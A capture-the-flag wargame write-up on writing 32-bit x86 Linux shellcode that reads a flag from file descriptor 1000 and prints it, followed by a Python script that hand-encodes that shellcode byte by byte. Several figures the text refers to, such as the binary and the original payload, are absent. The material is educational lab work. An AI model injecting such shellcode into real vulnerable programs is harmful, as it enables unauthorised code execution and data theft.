Wargames - Shellcode Lesson (simple)
So, this week, I got walked through a shellcode wargame by some unnamed cooked-c*#&.
So we have the following binary:
The important information is that the flag is stored in a file that the binary has open on file descriptor 1000. So, at a high level, our objective is to write shellcode that does the following:
Read from fd 1000
Write to stdout 1
So, we’ll have to write x86 assembly that makes syscalls, which means we need to understand how to invoke them (i.e. which values go in which registers). We can use this resource: kernelgrok.
So, looking at this, we get the following information:
So, to construct our shellcode, we need the following steps:
Create space for a buffer to read into
Call sys_read, reading from fd 1000 into the buffer
Call sys_write to write the contents of the buffer to stdout
This can be achieved with the following shellcode, which was created using kernelgrok as a reference for which values go in which registers:
Note: as it’s a 32-bit system, int 0x80 is the equivalent of syscall on a 64-bit machine.
After assembling it with pwntools’ asm(payload), the output is sent to the binary and the flag is successfully retrieved:
Note: the extra characters printed are garbage from the 20-byte buffer.
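As an added example, not the post’s own payload, the script below hand-encodes the three steps above as 32-bit x86 machine code in Python and also emits the mnemonics you would otherwise hand to pwntools’ asm(). It assumes the standard i386 Linux int 0x80 convention (eax = syscall number, ebx/ecx/edx = the first three arguments, return value in eax; sys_read = 3, sys_write = 4); the function names are mine. One deliberate difference from the walkthrough: it passes sys_read’s return value as the sys_write length, so the uninitialised tail of the 20-byte buffer (the garbage noted above) is not printed.

```python
"""Hand-encoded i386 Linux shellcode: read the flag fd, write it to stdout.

Added example, not the post's payload. Assumes the standard i386 Linux
int 0x80 convention: eax = syscall number (3 = sys_read, 4 = sys_write),
ebx/ecx/edx = first three arguments, return value in eax.
"""
import struct

SYS_READ = 3
SYS_WRITE = 4
FLAG_FD = 1000       # descriptor the flag file is open on (from the post)
STDOUT_FD = 1
BUF_SIZE = 20        # buffer size used in the post

# Register numbers as they appear in the x86 ModRM byte.
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}


def mov_imm32(reg, value):
    """mov r32, imm32  ->  B8+r followed by a little-endian imm32."""
    return bytes([0xB8 + REG[reg]]) + struct.pack("<I", value)


def mov_reg(dst, src):
    """mov r/m32, r32  ->  89 /r with ModRM mod=11, reg=src, rm=dst."""
    return bytes([0x89, 0xC0 | (REG[src] << 3) | REG[dst]])


def sub_esp_imm8(n):
    """sub esp, imm8  ->  83 /5 ib; ModRM 11 101 100 = 0xEC selects esp."""
    if not 0 <= n < 0x80:
        raise ValueError("imm8 form only covers 0..127")
    return bytes([0x83, 0xEC, n])


def int80():
    """int 0x80  ->  CD 80, the 32-bit syscall gate."""
    return b"\xcd\x80"


def listing(fd=FLAG_FD, size=BUF_SIZE):
    """The instruction sequence as (mnemonic, encoding) pairs."""
    return [
        # step 1: carve a buffer on the stack; esp now points at it
        ("sub esp, %d" % size,        sub_esp_imm8(size)),
        # step 2: sys_read(fd, esp, size)
        ("mov eax, %d" % SYS_READ,    mov_imm32("eax", SYS_READ)),
        ("mov ebx, %d" % fd,          mov_imm32("ebx", fd)),
        ("mov ecx, esp",              mov_reg("ecx", "esp")),
        ("mov edx, %d" % size,        mov_imm32("edx", size)),
        ("int 0x80",                  int80()),
        # eax now holds the byte count read; use it as the write length so
        # uninitialised buffer bytes (the "garbage") are never printed
        ("mov edx, eax",              mov_reg("edx", "eax")),
        # step 3: sys_write(1, esp, bytes_read); ecx still points at the buffer
        ("mov eax, %d" % SYS_WRITE,   mov_imm32("eax", SYS_WRITE)),
        ("mov ebx, %d" % STDOUT_FD,   mov_imm32("ebx", STDOUT_FD)),
        ("int 0x80",                  int80()),
    ]


def build_shellcode(fd=FLAG_FD, size=BUF_SIZE):
    """Concatenate the encodings into the raw payload bytes."""
    return b"".join(enc for _, enc in listing(fd, size))


def assembly_text(fd=FLAG_FD, size=BUF_SIZE):
    """Same sequence as text, the form you would hand to pwntools' asm()."""
    return "\n".join(mn for mn, _ in listing(fd, size))


if __name__ == "__main__":
    for mnemonic, enc in listing():
        print("%-16s %s" % (mnemonic, enc.hex(" ")))
    print("total: %d bytes" % len(build_shellcode()))
```

Running the script prints each mnemonic beside its encoding, which is a handy way to check by eye what asm() produced for the same listing. The payload contains NUL bytes (from the imm32 operands), which is fine here because the bytes are delivered with pwntools rather than through a string function; a NUL-free variant would need different instruction forms.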